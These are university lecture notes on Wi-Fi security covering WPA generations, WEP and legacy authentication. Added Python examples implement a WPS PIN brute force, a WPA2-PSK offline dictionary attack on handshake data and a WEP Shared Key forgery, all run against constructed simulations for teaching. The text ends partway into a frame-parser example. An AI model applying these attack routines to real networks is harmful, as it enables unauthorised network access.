
COMP 555 - Wireless Network Security

Lecture 3

Chapter 1: WLAN
Security Overview
Chapter 2: Legacy
802.11 Security

Lecture Objectives
• Introduce the new WPA3 security for Wi-Fi 6
• Review Standards Organizations that influence wireless
network security, specifically the Wi-Fi Alliance
• Explain IEEE 802.11 network security basics, such as:
• Data privacy
• Authentication, authorization, and accounting (AAA)
• Segmentation
• Monitoring
• Policy

• Describe IEEE 802.11 security history:
• 802.11i security amendment and WPA certifications
• Robust Security Network (RSN)
• Robust Security Network Association (RSNA)
(Coleman, Westcott, & Harkins, 2016a, 2016b)


Lecture Objectives (Cont.)
• Explain Legacy 802.11 Security, such as:
• Wired Equivalent Privacy (WEP)
• Open System authentication
• Shared Key authentication
• Virtual Private Networks (VPNs)
• MAC Filters
• Service Set Identifier (SSID) Segmentation
• SSID Cloaking/Hiding

(Coleman et al., 2016a, 2016b)


Standards Organizations
Table 1: Standards organizations that influence wireless network security

Wi-Fi Alliance
Purpose: Provides interoperability testing and certification (e.g., WPA, WPA2, and WPA3).

International Organization for Standardization (ISO)
Purpose: Develops standards to meet organizational needs (e.g., the OSI model).

Institute of Electrical and Electronics Engineers (IEEE)
Purpose: Creates and revises standards to satisfy organizational requirements (e.g., IEEE 802.11).

Internet Society (ISOC), composed of the following five main groups
Purpose: Promotes the open development, evolution, and use of the Internet for the benefit of all people throughout the world.
• Internet Engineering Task Force (IETF): produces technical documents known as RFCs (Requests for Comments) that influence the way people design, use, and manage the Internet.
• Internet Architecture Board (IAB): oversees the technical evolution of the Internet and supervises the IETF.
• Internet Corporation for Assigned Names and Numbers (ICANN): allocates IP addresses and manages the Domain Name System and root server system for the Internet.
• Internet Engineering Steering Group (IESG): provides technical management of the IETF's activities and the Internet standards process.
• Internet Research Task Force (IRTF): promotes research of importance to the evolution of the Internet.

(Coleman et al., 2016b)
Standards Organizations (Cont.)
• Wi-Fi Alliance
• Provides interoperability testing and certification.
• Wi-Fi is a registered trademark, originally registered
in 1999 by Wireless Ethernet Compatibility Alliance
(WECA) and now registered to the Wi-Fi Alliance.

Figure 1: Wi-Fi Certified logo for devices that have met the Wi-Fi Alliance's interoperability testing criteria
(Coleman et al., 2016b, p. 7)
Wi-Fi Alliance Interoperability Certifications
• Core Technology and Security
• Certifies 802.11a, b, g, n, and/or ac interoperability to ensure
wireless data transmission works as expected (see Table 2).
• Tests wireless devices for compliance with IEEE 802.11i security
requirements, such as support for Wi-Fi Protected Access (WPA)
and Wi-Fi Protected Access 2 (WPA2) in personal and enterprise
environments.
Table 2: Five generations of Wi-Fi

Wi-Fi technology | Frequency band | Maximum data rate
802.11a | 5 GHz | 54 Mbps
802.11b | 2.4 GHz | 11 Mbps
802.11g | 2.4 GHz | 54 Mbps
802.11n | 2.4 GHz, 5 GHz (2.4 or 5 GHz selectable, or 2.4 and 5 GHz concurrent) | 600 Mbps
802.11ac | 5 GHz | 6.93 Gbps

(Coleman et al., 2016b, p. 9)
Security in Wireless

Authentication: proving identity can be done using:
- Something you know
- Something you have
- Something you are

Encryption:
- Symmetric (the same key on both sides)
- Asymmetric (different keys: a public key and a private key)
Wireless Security Evolution

Timeline shown in the slide figure, oldest to newest:
MAC Address Authentication → WEP → Dynamic WEP with 802.1X → WPA/WPA2 → WPA3
Wi-Fi Alliance Interoperability Certifications

• Wi-Fi Protected Access (WPA)


• Certification introduced before the release of 802.11i
amendment to 802.11 standard
• Supports two modes:
• Personal and Enterprise
• Authentication methods:
• Personal mode uses passphrase or pre-shared key
• Enterprise mode uses 802.1X/EAP

• Encryption Mechanism / Cipher:


• TKIP / RC4

(Coleman et al., 2016b)


Wi-Fi Alliance Interoperability Certifications

• Wi-Fi Protected Access 2 (WPA2)


• Certification introduced after the release of 802.11i
amendment to 802.11 standard
• Supports two modes:
• Personal and Enterprise
• Authentication methods:
• Personal mode uses passphrase or pre-shared key
• Enterprise mode uses 802.1X/EAP

• Encryption Mechanism / Cipher:


• CCMP / AES and allows TKIP / RC4

(Coleman et al., 2016b)


Wi-Fi Alliance Interoperability Certifications (Cont.)
Table 3: Details of the WPA and WPA2 certifications

Wi-Fi Alliance security mechanism | Authentication mechanism | Encryption mechanism / cipher
WPA-Personal | Passphrase or Pre-Shared Key (PSK) | TKIP/RC4
WPA-Enterprise | 802.1X/EAP | TKIP/RC4
WPA2-Personal | Passphrase or Pre-Shared Key (PSK) | CCMP/AES or TKIP/RC4
WPA2-Enterprise | 802.1X/EAP | CCMP/AES or TKIP/RC4

Acronyms:
TKIP = Temporal Key Integrity Protocol
RC4 = Rivest Cipher 4 (named after Ron Rivest of RSA Security)
CCMP = Counter Mode with Cipher-Block Chaining Message Authentication Code Protocol
AES = Advanced Encryption Standard
EAP = Extensible Authentication Protocol

(Bartz, 2017, p. 57)
Wi-Fi Alliance Interoperability Certifications (Cont.)
• Wi-Fi Multimedia (WMM)
• Based on quality of service (QoS) mechanisms defined in the
802.11e amendment to 802.11 standard.
• Prioritizes transmission of time-sensitive applications like
voice or video on the half-duplex RF medium.
• Both the access point and wireless client must support WMM
interoperability certification.

• Wi-Fi Multimedia Power Save (WMM-PS)


• Helps conserve battery power for devices using Wi-Fi radios
by managing the time they spend in sleep mode.
• Critical for handheld and mobile devices like voice over Wi-Fi
(VoWiFi) phones, tablets, and notebook computers.
• Both the access point and wireless client must support WMM-PS
interoperability certification.
(Coleman et al., 2016b)
Wi-Fi Alliance Interoperability Certifications (Cont.)

• Wi-Fi Protected Setup (WPS)


• Provides simplified and automatic WPA and WPA2
security configurations for home and small business
owners.
• Possible configurations:
• Push-button configuration (PBC)
• PIN-based configuration
• Near Field Communication (NFC)

• Support for PIN-based configuration is mandatory in


all Wi-Fi Protected Setup devices.
• Support for PBC and NFC configurations is optional.

(Coleman et al., 2016b)


Wi-Fi Alliance Interoperability Certifications (Cont.)

• Security Hole with WPS

• A WPS security flaw was reported in December 2011.
• An attacker can brute-force the 8-digit PIN used to deliver the 256-bit pre-shared key, obtain that key, and gain access to the wireless network. The registrar acknowledges the first and second halves of the PIN separately, and the last digit is a checksum, so roughly 11,000 guesses suffice instead of the 100 million an 8-digit PIN suggests.
• Possible solutions:
• Disable the WPS feature
• Update the firmware on the wireless router
• Manually configure WPA2 security
• Upgrade to a newer router with better security settings

(Bartz, 2017)
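The following Python is an added example, not code from the lecture or the cited study guides. It shows why the 2011 WPS PIN attack is feasible: the registrar confirms the first four digits and the last four digits separately, and the eighth digit is a checksum of the first seven (the checksum rule is the one the WPS specification uses). The SplitPinRegistrar class, the function names and the sample PINs are constructed for the illustration; a real registrar would signal the half-PIN failures with EAP-NACK messages after WPS messages M4 and M6.

```python
"""Why the WPS PIN is brute-forceable: half-by-half acknowledgement plus a checksum digit.

Added illustration.  SplitPinRegistrar simulates the AP side; it is not real AP code.
"""


def wps_checksum_digit(first_seven: int) -> int:
    """Eighth (checksum) digit of a WPS PIN, computed from the first seven digits.

    WPS weights the digits 3,1,3,1,... from the right and requires the total
    to be a multiple of 10.
    """
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is eight digits and its checksum digit is correct."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum_digit(int(pin[:7])) == int(pin[7])


class SplitPinRegistrar:
    """Simulated WPS registrar with the flaw reported in December 2011.

    A real registrar replies EAP-NACK after message M4 when the first half of
    the PIN is wrong and after M6 when the second half is wrong, so the
    attacker learns which half failed.  This constructed class behaves the same.
    """

    def __init__(self, pin: str) -> None:
        if not is_valid_wps_pin(pin):
            raise ValueError("constructed PIN must be a valid WPS PIN")
        self._first, self._second = pin[:4], pin[4:]
        self.attempts = 0  # M4/M6 round trips the attacker had to make

    def check_first_half(self, guess: str) -> bool:
        self.attempts += 1
        return guess == self._first

    def check_second_half(self, guess: str) -> bool:
        self.attempts += 1
        return guess == self._second


def recover_pin(registrar: SplitPinRegistrar) -> str:
    """Brute-force the PIN using the split acknowledgements.

    First half: at most 10**4 tries.  Second half: only three digits are free
    (10**3 tries) because the eighth is derived from the first seven.  Worst
    case 11,000 attempts instead of the 10**8 an 8-digit PIN suggests.
    """
    first = None
    for i in range(10_000):
        guess = f"{i:04d}"
        if registrar.check_first_half(guess):
            first = guess
            break
    if first is None:
        raise RuntimeError("first half not found; registrar is not a split-verifier")
    for j in range(1_000):
        tail = f"{j:03d}"
        second = tail + str(wps_checksum_digit(int(first + tail)))
        if registrar.check_second_half(second):
            return first + second
    raise RuntimeError("second half not found")


def attack_cost(pin: str) -> int:
    """Number of registrar round trips needed to recover pin."""
    registrar = SplitPinRegistrar(pin)
    recovered = recover_pin(registrar)
    if recovered != pin:
        raise AssertionError("recovered PIN does not match")
    return registrar.attempts


if __name__ == "__main__":
    for sample in ("12345670", "99999995"):  # constructed PINs
        print(sample, "valid:", is_valid_wps_pin(sample), "attempts:", attack_cost(sample))
```

The worst-case PIN costs exactly 10,000 + 1,000 round trips; the only mitigations that change this arithmetic are the ones listed above (disabling WPS, or firmware that locks the registrar after a few failed attempts).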
802.11 Security Basics

Five major components are typically required to


secure an 802.11 wireless network:
• Data privacy
• Authentication, Authorization, and Accounting (AAA)
• Segmentation
• Monitoring
• Policy

(Coleman et al., 2016b)


802.11 Security Basics (Cont.)
Data Privacy
• 802.11 wireless networks transmit data freely and openly through the air, where anyone in range can capture it.
• Strong encryption is needed to ensure that data can be decrypted and processed only by the intended recipient.

Authentication, Authorization, and Accounting (AAA)


• Common security concept that defines the protection of network
resources.
• Authentication: Verifies user identity and credentials (e.g., via
usernames and passwords).
• Authorization: Determines the type of access a user or device has
to network resources based on file system rights and permissions.
• Accounting: Tracks the use of network resources by users and
devices through logging.

(Coleman et al., 2016b)


802.11 Security Basics (Cont.)
Segmentation
• Separates user traffic within a WLAN using techniques such as:
• Firewalls
• Routers
• Virtual private networks (VPNs)
• Virtual local area networks (VLANs)
• Encapsulation or tunnelling techniques (e.g., generic routing
encapsulation (GRE))
• Most common 802.11 enterprise WLAN segmentation strategy is VLANs.

Monitoring
• Use of hardware and software products to review the performance
and security of the wireless network.
• Logs, wireless intrusion detection systems (WIDSs), and wireless
intrusion prevention systems (WIPSs) should be used for monitoring.
(Coleman et al., 2016b)
802.11 Security Basics (Cont.)
Policy
• Documents that clearly outline the proper use and configuration of
wireless networks, and the consequences for not following mandated
procedures.
• Some policies applicable to wireless networks include:
• IT Acceptable Use Policy – defines purpose and use of WLAN
• Wireless Use Policy – provides specific details on how devices should
be used on WLAN
• Password Policy – outlines criteria, use, and protection of passwords
• Data Sensitivity Policy – defines what is considered sensitive data and
how it should be protected
• Physical Security Policy – explains how WLAN infrastructure will be
protected from theft and vandalism
• Remote Office Policy – describes the procedures remote users must
follow to protect the data of the organization

(Coleman et al., 2016b)


802.11 Security History
Original IEEE 802.11 Standard (1997-2004):
• Not much was defined in terms of security.
• Two key components of any wireless security solution are data
privacy (encryption) and authentication (identity verification).
• Wired Equivalent Privacy (WEP) was the only defined method of
encryption in an 802.11 network.
• WEP has been cracked and is not considered an acceptable
means of providing data privacy.
• Two methods of authentication were defined:
• Open System authentication
• Shared Key authentication

(Coleman et al., 2016b)


802.11 Security History (Cont.)
802.11i Security Amendment
• Ratified and published in 2004 as IEEE Standard 802.11i-2004.
• Defined stronger encryption and better authentication methods.
• Defined a robust security network (RSN) as follows:
• Uses Counter Mode with Cipher‐Block Chaining Message Authentication
Code Protocol (CCMP) and the Advanced Encryption Standard (AES)
algorithm for enhanced data privacy.
• Uses either IEEE 802.1X authorization framework with an Extensible
Authentication Protocol (EAP), or pre-shared keys (PSKs) for enhanced
authentication.

• Defined a robust security network association (RSNA) as follows:


• Where two wireless devices or stations establish a procedure to
authenticate and associate with each other as well as create dynamic
encryption keys through a process known as the 4-Way Handshake.
(Coleman et al., 2016b)
802.11 Security History (Cont.)
WPA Certifications Created by Wi-Fi Alliance
• Wi-Fi Protected Access (WPA)
• Created prior to the IEEE ratification of the 802.11i amendment.
• Considered a preview of 802.11i amendment.
• Supports only TKIP/ARC4 dynamic encryption-key generation methods.
• 802.1X/EAP authentication is required in the enterprise, and
passphrase or pre-shared key authentication in a SOHO environment.

• Wi-Fi Protected Access 2 (WPA2)


• Created after the IEEE ratification of the 802.11i amendment.
• Considered more of a mirror of 802.11i security amendment.
• Supports both CCMP/AES and TKIP/ARC4 dynamic encryption-key
generation methods.
• 802.1X/EAP authentication is required in the enterprise and passphrase
or pre-shared key authentication in a SOHO environment.
• AES cipher used by CCMP is processor-intensive.
• Some older legacy devices that support WEP and TKIP need to be
upgraded since hardware does not support CCMP.
(Coleman et al., 2016b)
WPA3
• Two types: WPA3-Personal (password-based, using SAE) and WPA3-Enterprise (802.1X/EAP with an authentication server)
• Prevents the use of old technology:
• WPA3 is not compatible with WEP or TKIP (the WPA version 1 cipher)
• WPA3-Enterprise uses EAP methods with stronger ciphers
• Adds new technology with improved security:
• WPA-PSK is replaced with SAE (Simultaneous Authentication of Equals)
• Optional 192-bit mode (Suite B) for high-grade encryption, available only in Enterprise mode
• Consistent cryptographic algorithms and hashing across encryption, key generation, and authentication
• Protected Management Frames (PMF, IEEE 802.11w) are required:
– Prevent "spoofed disconnect" attacks (forged deauthentication and disassociation frames)
– PMF also works with WPA2, where it is optional; WPA3 makes it mandatory
WPA3-Personal
• Disallows the WEP and TKIP protocols
• Requires the use of Protected Management Frames
• Replaces PSK with SAE (Simultaneous Authentication of Equals):
– Elliptic curve cryptography (a Diffie-Hellman style exchange known as Dragonfly)
– The password is never sent during the key exchange protocol
– Resistant to offline dictionary attacks:
❑ The master key (PMK) is derived from the SAE exchange, not from the passphrase alone, so a captured handshake cannot be used to test guesses offline
❑ Only one password guess is possible per network access attempt (online guessing only)
• Offers a "Transition Mode" in which one SSID accepts both WPA2-PSK and WPA3-SAE clients
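The following Python is an added example, not code from the lecture or the cited study guides. It covers two points from the slides above: the dynamic key derivation that the RSNA 4-Way Handshake performs in WPA2-Personal (PMK from passphrase and SSID, PTK from the PMK with both MAC addresses and both nonces, and the MIC on message 2), and the offline dictionary attack that design permits, which is exactly what SAE's key derivation removes. The SSID, passphrase, MAC addresses, nonces, wordlist and the EAPOL-Key message 2 bytes are all constructed; the function names are mine. The PBKDF2, PRF and HMAC-SHA1-128 MIC constructions are the ones 802.11i specifies for the PSK/CCMP case.

```python
"""WPA2-Personal key derivation behind the 4-Way Handshake, and the offline
dictionary attack it permits.  Added illustration; every input is constructed."""
from __future__ import annotations

import hashlib
import hmac

PTK_LEN = 48  # CCMP pairwise transient key: KCK (16) || KEK (16) || TK (16)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The PMK depends only on the passphrase and SSID, which is the root of the problem."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces)).
    AA/SPA are the AP and client MAC addresses; both nonces travel in the clear in messages 1 and 2."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, PTK_LEN)


def eapol_mic(kck: bytes, eapol_key_frame: bytes) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed) for the WPA2-PSK/CCMP AKM:
    HMAC-SHA1 truncated to 16 bytes (the TKIP variant uses HMAC-MD5)."""
    return hmac.new(kck, eapol_key_frame, hashlib.sha1).digest()[:16]


def offline_dictionary_attack(capture: dict, wordlist: list[str]) -> tuple[str | None, int]:
    """Recompute the message 2 MIC for each candidate passphrase.

    Only the sniffed handshake is needed: nothing is sent to the AP, so the
    AP cannot rate-limit or even observe the guesses.  Returns (passphrase or
    None, number of guesses made)."""
    for guesses, candidate in enumerate(wordlist, start=1):
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol_m2"]), capture["mic"]):
            return candidate, guesses
    return None, len(wordlist)


def simulate_handshake(passphrase: str, ssid: str) -> dict:
    """Values an eavesdropper obtains from one real 4-Way Handshake.

    The MAC addresses, nonces and EAPOL-Key message 2 bytes are constructed
    for this example, not taken from a real capture."""
    aa = bytes.fromhex("001122334455")    # AP (authenticator) address
    spa = bytes.fromhex("66778899aabb")   # client (supplicant) address
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    # Stand-in for message 2 with its 16-byte MIC field zeroed; a real frame
    # also carries key info, length, replay counter and the RSN element.
    eapol_m2 = b"\x01\x03" + b"\x00" * 15 + snonce + b"\x00" * 48
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol_m2": eapol_m2, "mic": eapol_mic(ptk[:16], eapol_m2)}


if __name__ == "__main__":
    cap = simulate_handshake("wireless123", "CorpNet")  # constructed network
    print(offline_dictionary_attack(cap, ["password", "letmein1", "wireless123"]))
```

Everything the attack function consumes is visible to a passive listener: the SSID, both addresses, both nonces and message 2 with its MIC. Under SAE the PMK comes out of the Dragonfly exchange rather than from PBKDF2 over the passphrase, so this loop has nothing to recompute and each guess costs a live exchange with the AP.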

WPA3-Enterprise
• Features:
– The same as WPA2-Enterprise (802.1X/EAP with a RADIUS server) with Protected Management Frames (PMF) enabled (mandatory).
– Optional 192-bit mode (Suite B):
• Enforces EAP-TLS with 256-bit encryption (AES-256 via GCMP-256) and SHA-384
• RSA keys of at least 3072 bits or the elliptic curve P-384
❑ TLS v1.2
❑ The EAP server enforces the policy via RADIUS attributes
❑ The 4-Way Handshake uses HMAC-SHA-384 with the 192-bit AKM

• Drawbacks:
– Apart from mandatory PMF, no real update to WPA2-Enterprise
– 192-bit mode requires a RADIUS server and clients that support EAP-TLS with the 192-bit cipher suites
Table 4: IEEE 802.11 security standards and certifications

802.11 standard | Wi-Fi Alliance certification | Authentication method | Encryption method | Cipher | Key generation
802.11 legacy | No certification | Open System or Shared Key | WEP | ARC4 | Static
(pre-802.11i) | WPA-Personal | Passphrase (also known as WPA-PSK and WPA Pre-Shared Key) | TKIP | ARC4 | Dynamic
(pre-802.11i) | WPA-Enterprise | 802.1X/EAP | TKIP | ARC4 | Dynamic
802.11-2012 | WPA2-Personal | Passphrase (also known as WPA2-PSK and WPA2 Pre-Shared Key) | CCMP (mandatory), TKIP (optional) | AES (mandatory), ARC4 (optional) | Dynamic
802.11-2012 | WPA2-Enterprise | 802.1X/EAP | CCMP (mandatory), TKIP (optional) | AES (mandatory), ARC4 (optional) | Dynamic

(Coleman et al., 2016b, p. 20)

WEP, Open System Authentication, and Shared Key Authentication are considered legacy security mechanisms and should not be part of any new network plan.
Open System Authentication
• Only pre-RSNA security mechanism that has not been deprecated
(discouraged from being used).
• Provides authentication without performing any type of client verification.
• Considered a null authentication because there is no exchange or
verification of identity between the devices.
• Every station (STA) is validated during Open System authentication.
• Open System authentication is used in a basic service set (BSS) and an
independent BSS (IBSS).
• Basic Service Set (BSS) is the collection of wireless devices that make up
a WLAN.
• Independent BSS (IBSS) is made up of wireless client stations only (no
access points) and operates in Ad Hoc Mode.
• Works in two different modes:
• Ad Hoc Mode: Wireless devices communicate without an access point.
Also known as peer-to-peer mode.
• Infrastructure Mode: Wireless devices communicate via an access point.
(Coleman et al., 2016a)
Open System Authentication (Cont.)
Process:
1. The client station (STA) makes an authentication request to the access point.
2. The access point authenticates the client STA without verifying its identity.
3. The client STA requests to associate or register with the access point based on
its 802.11 capabilities (e.g., encryption type and supported data rates).
4. The access point associates with the client STA by assigning it an Association
ID (AID) so that data can be transmitted and received between the devices.
5. The client STA establishes a Layer 2 connection to the access point and joins
the basic service set (BSS).
(Cisco, n.d.; Coleman et al., 2016a)

Figure 2: Open System authentication (Coleman et al., 2016a, p. 32)
Open System Authentication (Cont.)
• WEP encryption is optional with Open System authentication.
• WEP is used to only encrypt the MAC Service Data Unit (MSDU),
which contains the Layers 3 to 7 payload of 802.11 data frames,
after the client station is authenticated and associated.
• WEP, therefore, is not part of the Open System authentication
process, but a way to provide data privacy after authentication and
association occur.
• Question: Why is Open System authentication still used when it does not verify the identity of client devices?
• Answer: Open System authentication does not itself need to be secure, because it is only the first step. Stronger authentication such as 802.1X/EAP runs after association, and the client is not allowed to pass data until that exchange succeeds (see Figure 3).

(Coleman et al., 2016a)


Open System Authentication (Cont.)

Figure 3: Open System and 802.1X/EAP authentication (Coleman et al., 2016a, p. 32)
Figure callout: the RADIUS server communicates with a central server (user database) to authenticate users/devices and authorize them to access network resources.

• Open System authentication and association between the client STA and the AP still occur prior to the 802.1X/EAP authentication exchange between the client STA and the RADIUS server.
• Open System and 802.1X/EAP authentication can be used to accommodate bring your own device (BYOD) and guest access.
(Coleman et al., 2016a)
Shared Key Authentication
• Uses Wired Equivalent Privacy (WEP) to authenticate client stations.
• Requires that a static WEP key be configured on both the client STA and the access point (AP).
• Authentication will not work if the static WEP keys do not match.
• Similar to Open System authentication but includes a challenge and response between the AP and the client station within the BSS.
• The Shared Key authentication process is outlined in Figure 4.
• The shared WEP key is used to encrypt and decrypt the cleartext challenge.
• If authentication is successful, the same static WEP key will be used to encrypt and decrypt 802.11 data frames.
• Shared Key authentication can also be used between two STAs in an IBSS.
• Deprecated since it uses WEP.

Figure 4: Shared Key authentication (Coleman et al., 2016a, p. 33)
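The following Python is an added example, not code from the lecture or the cited study guides. It models the four-message Shared Key exchange over WEP (cleartext challenge in message 2, encrypted challenge in message 3, verification in message 4) and shows a consequence of authenticating with WEP that is well known but not spelled out on the slide: because the challenge is sent in cleartext and its WEP-encrypted form follows, an eavesdropper recovers the RC4 keystream for that IV and can later pass Shared Key authentication without the key. RC4, the 40-bit key, the IV and both challenges are constructed; the AccessPoint class and the function names are mine.

```python
"""Shared Key authentication over WEP and why it leaks the keystream.
Added illustration; RC4, key and challenges are constructed for the demo."""
from __future__ import annotations

import zlib

CHALLENGE_LEN = 128  # the 802.11 Shared Key challenge text is 128 octets


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (ARC4) keystream; WEP seeds it with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP: append the CRC-32 ICV, XOR with RC4(IV || key); the IV is sent in the clear."""
    data = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4_keystream(iv + wep_key, len(data))
    return iv + bytes(a ^ b for a, b in zip(data, ks))


def wep_decrypt(wep_key: bytes, frame: bytes) -> bytes | None:
    """Return the plaintext if the ICV verifies, else None."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + wep_key, len(body))
    data = bytes(a ^ b for a, b in zip(body, ks))
    plaintext, icv = data[:-4], data[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        return None
    return plaintext


class AccessPoint:
    """Authenticator side of Shared Key authentication (messages 2 and 4)."""

    def __init__(self, wep_key: bytes) -> None:
        self._key = wep_key
        self._pending = b""

    def message2_challenge(self, challenge: bytes) -> bytes:
        """Real APs generate the challenge; it is passed in so the demo is deterministic."""
        if len(challenge) != CHALLENGE_LEN:
            raise ValueError("challenge must be 128 octets")
        self._pending = challenge
        return challenge  # transmitted in cleartext

    def message4_verify(self, response_frame: bytes) -> bool:
        return wep_decrypt(self._key, response_frame) == self._pending


def legitimate_station_response(wep_key: bytes, iv: bytes, challenge: bytes) -> bytes:
    """Message 3: the station encrypts the challenge with the shared static WEP key."""
    return wep_encrypt(wep_key, iv, challenge)


def keystream_from_observed_exchange(challenge: bytes, response_frame: bytes) -> tuple[bytes, bytes]:
    """Eavesdropper: (challenge || ICV) XOR ciphertext = the RC4 keystream for that IV."""
    iv, body = response_frame[:3], response_frame[3:]
    known_plain = challenge + zlib.crc32(challenge).to_bytes(4, "little")
    return iv, bytes(a ^ b for a, b in zip(known_plain, body))


def forged_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Attacker answers a fresh challenge without the key by reusing IV and keystream."""
    plain = new_challenge + zlib.crc32(new_challenge).to_bytes(4, "little")
    return iv + bytes(a ^ b for a, b in zip(plain, keystream))


def demo() -> tuple[bool, bool]:
    """Returns (legitimate client accepted, keyless attacker accepted)."""
    key = bytes.fromhex("0102030405")                      # constructed 40-bit WEP key
    iv = b"\x11\x22\x33"                                    # constructed IV
    ap = AccessPoint(key)
    c1 = bytes(range(CHALLENGE_LEN))                        # constructed challenge 1
    c2 = bytes(255 - b for b in range(CHALLENGE_LEN))       # constructed challenge 2
    # Legitimate exchange, observed by the attacker.
    ap.message2_challenge(c1)
    r1 = legitimate_station_response(key, iv, c1)
    legit_ok = ap.message4_verify(r1)
    # Attacker's own authentication attempt, using only what was sniffed.
    seen_iv, ks = keystream_from_observed_exchange(c1, r1)
    ap.message2_challenge(c2)
    forged_ok = ap.message4_verify(forged_response(seen_iv, ks, c2))
    return legit_ok, forged_ok
```

The AP accepts the forged message 3 because WEP never binds the IV to the session: any IV the client chooses is valid, so the attacker simply reuses the one whose keystream it already knows. This is why Shared Key authentication is rated weaker than Open System authentication even before WEP's key-recovery attacks are considered.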
Virtual Private Networks (VPNs)
• A virtual private network (VPN) is a technology that creates a safe and encrypted connection or tunnel over a less secure network, such as the Internet.
• Developed as a way to allow remote users and branch offices to securely access corporate data, applications, and other resources.

Major VPN protocols:
• Point-to-Point Tunneling Protocol (PPTP)
• Layer 2 Tunneling Protocol (L2TP)
• Internet Protocol Security (IPsec)
• Secure Sockets Layer (SSL), now Transport Layer Security (TLS)

Figure 5: VPN and WLAN client access security (Coleman et al., 2016a, p. 46)
VPNs and IEEE 802.11 WLANs
Why VPNs are not a recommended enterprise security solution for 802.11 WLANs:
• VPN Configuration Complexity
• Many components have to be installed and configured.
• An IP address is needed before a VPN connection can be established.
• A potential attacker can get both a Layer 2 and Layer 3 connection to an
access point before the VPN connection is established.
• Since most VPNs operate at Layer 3 of the OSI model, static routes often
need to be configured, which requires advanced routing skills.

• VPN Scalability
• As the size of the network grows, VPN servers will need to be expanded and
upgraded, which can be costly.
• VPN client software may need to be added to each computer connecting to
the WLAN, which can be a time-consuming process.

• WPA2 methods like CCMP/AES encryption and 802.1X/EAP authentication using


a RADIUS (Remote Authentication Dial-In User Service) server provide simpler
and cheaper enterprise solutions for secure WLAN client access.
(Coleman et al., 2016a)
MAC Filters
• Allow or deny access based upon the physical or media access control (MAC) address of a device.
• Weak security measure: the MAC address is transmitted in cleartext in every 802.11 frame and a client's address is easily changed in software, so an attacker can capture a permitted address with a protocol analyzer and spoof it.
• Still used in SOHO deployments since it is a quick and simple way to control access to network resources.
• Often implemented on legacy wireless access points that do not support stronger security.
• Usually a big waste of administrative time relative to the protection it provides, given how visible the addresses are in a protocol analyzer.
• Filter lists are also small (for example, 500 addresses held locally, extendable to 2,000 on the device used as an example), which limits scalability.
(Coleman et al., 2016a)
SSID (Service Set Identifier) Segmentation
VLAN and SSID segmentation is another technique to provide security in a WLAN environment using enterprise-class autonomous access points.
• The AP is configured for VLAN tagging using the 802.1Q protocol.
• The AP is connected to a Layer 2 or Layer 3 switch.
• Different users are segmented by a different SSID/VLAN pair.
• Each SSID is configured with different security settings.
• However, this security strategy is not recommended because too many SSIDs configured on an AP cause excessive MAC layer overhead (each SSID is advertised with its own beacons), which adversely affects the throughput and performance of the WLAN.
• No more than 4 SSIDs should be configured per radio on the AP.

Figure 6: SSID/VLAN/Subnet mapping (Coleman et al., 2016a, p. 51)
SSID Cloaking/Hiding
• Removes the SSID from the beacon frames the AP broadcasts, so casual users do not see the network in their client's network list.
• AP(s) still respond to probe requests for the given SSID so that legitimate end users can connect to the WLAN.
• Not a recommended enterprise security solution for 802.11 WLANs for the following reasons:
• A protocol analyzer, such as Wireshark, can capture the probe response, association request, and other frames exchanged by legitimate users and discover the SSID, which is transmitted in cleartext.
• Some hardware devices may not support connecting to hidden or cloaked SSIDs.
• Assisting end users with manually entering or troubleshooting SSIDs often consumes a lot of valuable technical support time.

(Coleman et al., 2016a)
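The following Python is an added example, not code from the lecture or the cited study guides, and it covers both the MAC filter and the SSID cloaking points above. It is a small parser for the 802.11 management frame header and the SSID element, run over two constructed frames (no radiotap header and no FCS) from a cloaked network: the beacon carries an empty SSID element, while the unicast probe response carries the real name, and every frame exposes the client and AP addresses. Addresses, SSID, frame contents and function names are all constructed for the illustration.

```python
"""Parse the 802.11 management frame header and SSID element.
Added illustration with constructed frames (no radiotap header, no FCS)."""
from __future__ import annotations

import struct

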